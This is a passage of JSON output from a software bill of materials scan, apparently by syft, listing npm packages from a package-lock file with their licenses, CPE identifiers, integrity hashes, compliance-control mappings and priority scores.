[ "sbom", "package" ], "raw": { "id": "ae03eb850b2a6844", "name": "require-directory", "version": "2.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:require-directory:require-directory:2.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require-directory:require_directory:2.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require_directory:require-directory:2.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require_directory:require_directory:2.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require:require-directory:2.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require:require_directory:2.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/require-directory@2.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ae7e8898d2f0d0c8", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: require-from-string 2.0.2", "title": "require-from-string 2.0.2", "description": "Package discovered: require-from-string 2.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f7f7aa302949d36c", "name": "require-from-string", "version": "2.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:require-from-string:require-from-string:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require-from-string:require_from_string:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require_from_string:require-from-string:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require_from_string:require_from_string:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require-from:require-from-string:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require-from:require_from_string:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require_from:require-from-string:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require_from:require_from_string:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require:require-from-string:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require:require_from_string:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/require-from-string@2.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz", "integrity": "sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2d09a802d546535f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: require-main-filename 2.0.0", "title": "require-main-filename 2.0.0", "description": "Package discovered: require-main-filename 2.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "791f53dc42a97604", "name": "require-main-filename", "version": "2.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:require-main-filename:require-main-filename:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require-main-filename:require_main_filename:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require_main_filename:require-main-filename:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require_main_filename:require_main_filename:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require-main:require-main-filename:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require-main:require_main_filename:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require_main:require-main-filename:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require_main:require_main_filename:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require:require-main-filename:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:require:require_main_filename:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/require-main-filename@2.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/require-main-filename/-/require-main-filename-2.0.0.tgz", "integrity": "sha512-NKN5kMDylKuldxYLSUfrbo5Tuzh4hd+2E8NPPX02mZtn1VuREQToYe/ZdlJy+J3uCpfaiGF05e7B8W0iXbQHmg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b3700e9b1b03966b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: resend 3.5.0", "title": "resend 3.5.0", "description": "Package discovered: resend 3.5.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c52cdc280efaa4d0", "name": "resend", "version": "3.5.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:resend:resend:3.5.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/resend@3.5.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/resend/-/resend-3.5.0.tgz", "integrity": "sha512-bKu4LhXSecP6krvhfDzyDESApYdNfjirD5kykkT1xO0Cj9TKSiGh5Void4pGTs3Am+inSnp4dg0B5XzdwHBJOQ==", "dependencies": { "@react-email/render": "0.0.16" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7be6d0329d7fce71", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: resolve 1.22.12", "title": "resolve 1.22.12", "description": "Package discovered: resolve 1.22.12", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2e445c7ed78482c1", "name": "resolve", "version": "1.22.12", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:resolve:resolve:1.22.12:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/resolve@1.22.12", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.12.tgz", "integrity": "sha512-TyeJ1zif53BPfHootBGwPRYT1RUt6oGWsaQr8UyZW/eAm9bKoijtvruSDEmZHm92CwS9nj7/fWttqPCgzep8CA==", "dependencies": { "es-errors": "^1.3.0", "is-core-module": "^2.16.1", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "3f98609d8855980b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: restructure 3.0.2", "title": "restructure 3.0.2", "description": "Package discovered: restructure 3.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "05272d1e7e2ad4be", "name": "restructure", "version": "3.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:restructure:restructure:3.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/restructure@3.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/restructure/-/restructure-3.0.2.tgz", "integrity": "sha512-gSfoiOEA0VPE6Tukkrr7I0RBdE0s7H1eFCDBk05l1KIQT1UIKNc5JZy6jdyW6eYH3aR3g5b3PuL77rq0hvwtAw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b7f5c38e4c9ed33f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: retry 0.13.1", "title": "retry 0.13.1", "description": "Package discovered: retry 0.13.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b8be0fab008ab183", "name": "retry", "version": "0.13.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:retry:retry:0.13.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/retry@0.13.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/retry/-/retry-0.13.1.tgz", "integrity": "sha512-XQBQ3I8W1Cge0Seh+6gjj03LbmRFWuoszgK9ooCpwYIrhhoO80pfq4cUkU5DkknwfOfFteRwlZ56PYOGYyFWdg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b8976a72aaa61b4d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: retry-request 7.0.2", "title": "retry-request 7.0.2", "description": "Package discovered: retry-request 7.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "672814322994feff", "name": "retry-request", "version": "7.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:retry-request:retry-request:7.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:retry-request:retry_request:7.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:retry_request:retry-request:7.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:retry_request:retry_request:7.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:retry:retry-request:7.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:retry:retry_request:7.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/retry-request@7.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-7.0.2.tgz", "integrity": "sha512-dUOvLMJ0/JJYEn8NrpOaGNE7X3vpI5XlZS/u0ANjqtcZVKnIxP7IgCFwrKTxENw29emmwug53awKtaMm4i9g5w==", "dependencies": { "@types/request": "^2.48.8", "extend": "^3.0.2", "teeny-request": "^9.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0d600ce535ab6bd3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: reusify 1.1.0", "title": "reusify 1.1.0", "description": "Package discovered: reusify 1.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "456353a253e18966", "name": "reusify", "version": "1.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:reusify:reusify:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/reusify@1.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/reusify/-/reusify-1.1.0.tgz", "integrity": "sha512-g6QUff04oZpHs0eG5p83rFLhHeV00ug/Yf9nZM6fLeUrPguBTkTQOdpAWWspMh55TZfVQDPaN3NQJfbVRAxdIw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "3a557f6b562fa305", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: run-parallel 1.2.0", "title": "run-parallel 1.2.0", "description": "Package discovered: run-parallel 1.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ca5a4d8be889885f", "name": "run-parallel", "version": "1.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:run-parallel:run-parallel:1.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:run-parallel:run_parallel:1.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:run_parallel:run-parallel:1.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:run_parallel:run_parallel:1.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:run:run-parallel:1.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": 